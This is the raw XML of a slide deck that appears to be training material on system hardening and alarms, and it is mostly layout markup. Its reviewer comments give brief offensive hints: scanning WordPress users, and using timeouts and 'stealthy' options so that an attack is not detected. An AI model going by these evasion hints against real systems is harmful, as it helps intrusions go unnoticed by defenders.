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05" r:id="rId2"/>
    <p:sldMasterId id="2147483727" r:id="rId3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId32"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="262" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="283" r:id="rId13"/>
    <p:sldId id="285"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24377650" cy="13716000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Amatic SC" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
      <p:regular r:id="rId33"/>
      <p:bold r:id="rId34"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Helvetica Neue" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId35"/>
      <p:bold r:id="rId36"/>
      <p:italic r:id="rId37"/>
      <p:boldItalic r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inconsolata" pitchFamily="1" charset="0"/>
      <p:regular r:id="rId39"/>
      <p:bold r:id="rId40"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lato Light" panose="020F0502020204030203" pitchFamily="3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Black" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:bold r:id="rId49"/>
      <p:boldItalic r:id="rId50"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId51"/>
      <p:bold r:id="rId52"/>
      <p:italic r:id="rId53"/>
      <p:boldItalic r:id="rId54"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId55"/>
      <p:bold r:id="rId56"/>
      <p:italic r:id="rId57"/>
      <p:boldItalic r:id="rId58"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin"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h0ZqqK1MSPgzfcv10xzAp3D9iNZ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ishabh kalia"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EE18AC-DD6A-4FD0-9572-6E9059F1DDDE}">
  <a:tblStyle styleId="{D2EE18AC-DD6A-4FD0-9572-6E9059F1DDD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0" d="100"/>
          <a:sy n="40" d="100"/>
        </p:scale>
        <p:origin x="372" y="17"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide pos="958"/>
        <p:guide orient="horz" pos="8160"/>
        <p:guide orient="horz" pos="480"/>
        <p:guide pos="14398"/>
        <p:guide orient="horz" pos="3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customschemas.google.com/relationships/presentationmetadata" Target="metadata"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font2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7.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6-18T03:00:20.753" idx="1">
    <p:pos x="6000" y="0"/>
    <p:text>Wp scan to check the  users.</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a3noY5c"/>
      </p:ext>
    </p:extLst>
  </p:cm>
  <p:cm authorId="0" dt="2022-06-18T03:00:56.003" idx="2">
    <p:pos x="0" y="1135"/>
    <p:text>anything more  than 400error will trigger the attack</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a3noY5g"/>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2-06-18T02:59:54.784" idx="4">
    <p:pos x="0" y="1377"/>
    <p:text>timeout make it in stealth</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a3noY5Y"/>
      </p:ext>
    </p:extLst>
  </p:cm>
  <p:cm authorId="0" dt="2022-06-18T03:01:33.262" idx="3">
    <p:pos x="0" y="1277"/>
    <p:text>when you add stealthy at the  back jon can not be detected</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a3noY5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Lato Light"/>
                <a:ea typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
                <a:sym typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" marR="0" lvl="1"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Lato Light"/>
                <a:ea typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
                <a:sym typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" marR="0" lvl="2"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Lato Light"/>
                <a:ea typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
                <a:sym typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" marR="0" lvl="3"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Lato Light"/>
                <a:ea typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
                <a:sym typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" marR="0" lvl="4"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Lato Light"/>
                <a:ea typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
                <a:sym typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" marR="0" lvl="5"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Lato Light"/>
                <a:ea typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
                <a:sym typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marR="0" lvl="1"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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2318" name="Google Shape;2318;p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9" name="Google Shape;231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p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9" name="Google Shape;239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0511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6" name="Google Shape;24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3272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p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9" name="Google Shape;239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6" name="Google Shape;24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5" name="Google Shape;241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p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4" name="Google Shape;242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2" name="Google Shape;243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p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1" name="Google Shape;24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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2447" name="Google Shape;2447;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8" name="Google Shape;244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7" name="Google Shape;245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13355dbaff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13355dbaffb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8" name="Google Shape;2328;g13355dbaffb_2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p1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6" name="Google Shape;2466;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13355dbaffb_8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13355dbaffb_8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5" name="Google Shape;2475;g13355dbaffb_8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g13355dbaffb_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3" name="Google Shape;2483;g13355dbaffb_8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4" name="Google Shape;2484;g13355dbaffb_8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p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3" name="Google Shape;249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p19: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0" name="Google Shape;250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p2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8" name="Google Shape;250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p2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5" name="Google Shape;251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13355dbaffb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 name="Google Shape;2522;g13355dbaffb_2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3" name="Google Shape;2523;g13355dbaffb_2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13355dbaffb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13355dbaffb_7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2" name="Google Shape;2532;g13355dbaffb_7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6" name="Google Shape;2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7" name="Google Shape;233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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2348" name="Google Shape;2348;p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9" name="Google Shape;234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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2356" name="Google Shape;2356;p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7" name="Google Shape;2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p5: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7" name="Google Shape;236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p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5" name="Google Shape;237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p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3" name="Google Shape;238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p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1" name="Google Shape;239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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Google Shape;12;p2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 name="Google Shape;13;p25"/>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9600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="9600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>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 name="Google Shape;14;p2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09"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="110" name="Google Shape;110;p3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11" name="Google Shape;111;p3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9600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="9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12" name="Google Shape;112;p3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3" name="Google Shape;113;p3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725"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1726" name="Google Shape;1726;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27" name="Google Shape;1727;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728" name="Google Shape;1728;p127"/>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729" name="Google Shape;1729;p12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30" name="Google Shape;1730;p127"/>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731" name="Google Shape;1731;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732" name="Google Shape;1732;p127"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218833" y="3586941"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1733" name="Google Shape;1733;p127"/>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01</a:t>
              </a:r>
              <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1734" name="Google Shape;1734;p127"/>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5" name="Google Shape;1735;p127"/>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127"/>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737" name="Google Shape;1737;p127"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8811455" y="3586941"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1738" name="Google Shape;1738;p127"/>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02</a:t>
              </a:r>
              <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1739" name="Google Shape;1739;p127"/>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0" name="Google Shape;1740;p127"/>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27"/>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742" name="Google Shape;1742;p127"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="16353290" y="3588941"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1743" name="Google Shape;1743;p127"/>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03</a:t>
              </a:r>
              <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1744" name="Google Shape;1744;p127"/>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45" name="Google Shape;1745;p127"/>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27"/>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747"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1748" name="Google Shape;1748;p128"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11427090" y="1732400"/>
            <a:ext cx="2205958" cy="10973966"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1749" name="Google Shape;1749;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750" name="Google Shape;1750;p128"/>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751" name="Google Shape;1751;p12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52" name="Google Shape;1752;p128"/>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753" name="Google Shape;1753;p12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54" name="Google Shape;1754;p128"/>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55" name="Google Shape;1755;p128"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>System Hardening</a:t>
            </a:r>
            <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1756" name="Google Shape;1756;p128"/>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28"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Alarm</a:t>
            </a:r>
            <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1758" name="Google Shape;1758;p128"/>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128"/>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760"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1761" name="Google Shape;1761;p1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62" name="Google Shape;1762;p1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763" name="Google Shape;1763;p129"/>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764" name="Google Shape;1764;p12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65" name="Google Shape;1765;p129"/>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766" name="Google Shape;1766;p1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67" name="Google Shape;1767;p129"/>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01</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1768" name="Google Shape;1768;p129"/>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129"/>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129"/>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129"/>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129"/>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02</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1773" name="Google Shape;1773;p129"/>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03</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1774" name="Google Shape;1774;p129"/>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29"/>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129"/>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129"/>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29"/>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04</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1779" name="Google Shape;1779;p129"/>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05</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1780" name="Google Shape;1780;p129"/>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29"/>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129"/>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83" name="Google Shape;1783;p129"/>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marR="0" lvl="0" algn="r"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84" name="Google Shape;1784;p129"/>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85" name="Google Shape;1785;p129"/>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marR="0" lvl="0" algn="r"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86" name="Google Shape;1786;p129"/>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787"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1788" name="Google Shape;1788;p13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1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90" name="Google Shape;1790;p1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791" name="Google Shape;1791;p130"/>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792" name="Google Shape;1792;p13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93" name="Google Shape;1793;p130"/>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794" name="Google Shape;1794;p1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95" name="Google Shape;1795;p13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96" name="Google Shape;1796;p13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13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3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13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00" name="Google Shape;1800;p13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01" name="Google Shape;1801;p13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802" name="Google Shape;1802;p13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3" name="Google Shape;1803;p130"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5938928"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1804" name="Google Shape;1804;p130"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152516" y="10444195"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1805" name="Google Shape;1805;p13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806"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1807" name="Google Shape;1807;p13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1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09" name="Google Shape;1809;p1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810" name="Google Shape;1810;p131"/>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811" name="Google Shape;1811;p13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812" name="Google Shape;1812;p131"/>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813" name="Google Shape;1813;p1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14" name="Google Shape;1814;p13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15" name="Google Shape;1815;p13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3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13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13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19" name="Google Shape;1819;p13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20" name="Google Shape;1820;p13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821" name="Google Shape;1821;p13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2" name="Google Shape;1822;p131"/>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3" name="Google Shape;1823;p131"/>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4" name="Google Shape;1824;p13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825"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1826" name="Google Shape;1826;p13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1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28" name="Google Shape;1828;p1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829" name="Google Shape;1829;p132"/>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830" name="Google Shape;1830;p13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831" name="Google Shape;1831;p132"/>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832" name="Google Shape;1832;p1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33" name="Google Shape;1833;p13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34" name="Google Shape;1834;p13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3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13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13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38" name="Google Shape;1838;p13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39" name="Google Shape;1839;p13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840" name="Google Shape;1840;p132"/>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1" name="Google Shape;1841;p132"/>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2" name="Google Shape;1842;p132"/>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3" name="Google Shape;1843;p132"/>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844"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1845" name="Google Shape;1845;p1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1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47" name="Google Shape;1847;p1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848" name="Google Shape;1848;p133"/>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849" name="Google Shape;1849;p13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850" name="Google Shape;1850;p133"/>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851" name="Google Shape;1851;p1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52" name="Google Shape;1852;p1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53" name="Google Shape;1853;p1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1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57" name="Google Shape;1857;p1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58" name="Google Shape;1858;p1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859" name="Google Shape;1859;p133"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3740828"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1860" name="Google Shape;1860;p133"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5938928"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1861" name="Google Shape;1861;p133"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="8149861"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1862" name="Google Shape;1862;p133"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>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863"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1864" name="Google Shape;1864;p13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66" name="Google Shape;1866;p1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867" name="Google Shape;1867;p134"/>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868" name="Google Shape;1868;p13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869" name="Google Shape;1869;p134"/>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870" name="Google Shape;1870;p1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71" name="Google Shape;1871;p13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72" name="Google Shape;1872;p13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3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13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13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76" name="Google Shape;1876;p13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77" name="Google Shape;1877;p13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78" name="Google Shape;1878;p13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3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880" name="Google Shape;1880;p13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1" name="Google Shape;1881;p134"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5360928"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1882" name="Google Shape;1882;p13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3" name="Google Shape;1883;p134"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="9047395"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1884" name="Google Shape;1884;p13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885"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
